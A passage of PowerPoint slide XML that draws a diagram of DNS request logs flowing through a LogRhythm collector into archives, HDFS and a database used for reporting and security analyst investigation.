          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7932187" y="5904060"/>
            <a:ext cx="514090" cy="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pic>
        <p:nvPicPr>
          <p:cNvPr id="44" name="Picture 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06967D83-BDB4-45B0-9A6E-A0E0503BEF8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
            <a:duotone>
              <a:schemeClr val="accent2">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7563227" y="5343015"/>
            <a:ext cx="463521" cy="571370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="45" name="Straight Arrow Connector 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC701E5F-C305-438B-A0B0-34BDEC56C9A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7769317" y="4725488"/>
            <a:ext cx="0" cy="478276"/>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46" name="Can 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{863189CC-068E-487F-950C-C14704C5A5BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7564139" y="4095261"/>
            <a:ext cx="403521" cy="484025"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 59975"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                  <a:lumOff val="50000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
          </a:gradFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="65000"/>
                <a:lumOff val="3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47" name="Picture 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1562B4C4-3F1F-4E16-8047-6E0133A9656E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
            <a:grayscl/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3795280" y="3984099"/>
            <a:ext cx="736600" cy="736600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="48" name="Straight Arrow Connector 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4A18D4E-8110-4811-8850-55377B95A5E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4558614" y="4448852"/>
            <a:ext cx="2921876" cy="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49" name="Straight Arrow Connector 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E28BBF0C-A678-46D7-ACDC-4FF0625E56D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5199745" y="4234843"/>
            <a:ext cx="2280745" cy="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50" name="Straight Arrow Connector 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56985617-7742-4654-A9D5-AFCE0B356F18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5199745" y="3749094"/>
            <a:ext cx="6112" cy="485749"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="51" name="Picture 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85092429-192E-4784-90B8-7F1C58F45E38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
            <a:duotone>
              <a:schemeClr val="accent2">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4504463" y="3031960"/>
            <a:ext cx="463521" cy="571370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="52" name="Picture 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{172B94BF-C46C-4441-8A1F-7F7EB50FFE69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
            <a:duotone>
              <a:schemeClr val="accent2">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4736224" y="3165938"/>
            <a:ext cx="463521" cy="571370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53" name="Picture 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8021D5C-15D7-4821-A8BD-DEB115502923}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
            <a:duotone>
              <a:schemeClr val="accent2">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5005045" y="3265790"/>
            <a:ext cx="463521" cy="571370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="TextBox 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{725383CC-5115-493F-8FA7-DE0A908EE608}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6722907" y="2086628"/>
            <a:ext cx="1205343" cy="184666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="TextBox 54">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C6149AF-807C-489E-AE4C-3A86F5CB4EF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6728167" y="2354638"/>
            <a:ext cx="1205343" cy="184666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IP Address returned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="TextBox 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FA29788-EA9F-4AA3-B74D-69BC92A54038}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7545925" y="2691561"/>
            <a:ext cx="1205343" cy="184666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="TextBox 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4315D4C-9C24-4D9F-9120-E317A2F75814}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8079539" y="2066297"/>
            <a:ext cx="1205343" cy="184666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Log File</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="TextBox 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{296BE87E-71DA-4307-8B2A-BADFBC5448BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8824569" y="2545236"/>
            <a:ext cx="1205343" cy="184666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Log Rhythm Collector</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="TextBox 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BACEDA52-F12E-4188-A8E1-2726AC175993}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8870362" y="3262825"/>
            <a:ext cx="1205343" cy="184666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Log Rhythm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="TextBox 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CF8A119-1702-4E89-8D3F-51433228FE25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9547180" y="4569245"/>
            <a:ext cx="1205343" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Log Rhythm\</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Archives</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="61" name="Picture 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4CE8A03-F8C5-4DCD-9573-51FE8E963374}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
            <a:grayscl/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10042449" y="4073956"/>
            <a:ext cx="393113" cy="393113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="TextBox 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{179AD68F-152E-404F-802F-A96D2BA5D78F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8129862" y="3843788"/>
            <a:ext cx="1212113" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Forked in Log Rhythm Distribution Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="TextBox 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{705F762A-0F8D-4C5E-A006-0E95C9C29BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5762119" y="2819317"/>
            <a:ext cx="1205343" cy="184666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Web Address Accessed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="TextBox 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7787AB4-EC70-4B68-B81B-91F45876C0AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4277436" y="2803315"/>
            <a:ext cx="1205343" cy="184666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Managed Information DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="TextBox 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A67E26EA-562F-44F8-BB69-55E8529FFAB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4629092" y="3858488"/>
            <a:ext cx="1205343" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data exported for reporting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="TextBox 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{383F5A0E-A3F0-47A2-BEFC-DCBF532B37CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5416880" y="4486953"/>
            <a:ext cx="1205343" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Security Analyst Queries and Investigation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="TextBox 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71CA1B31-5558-4E65-BA2D-906F530FF98F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7172148" y="4335103"/>
            <a:ext cx="1205343" cy="184666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HDFS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
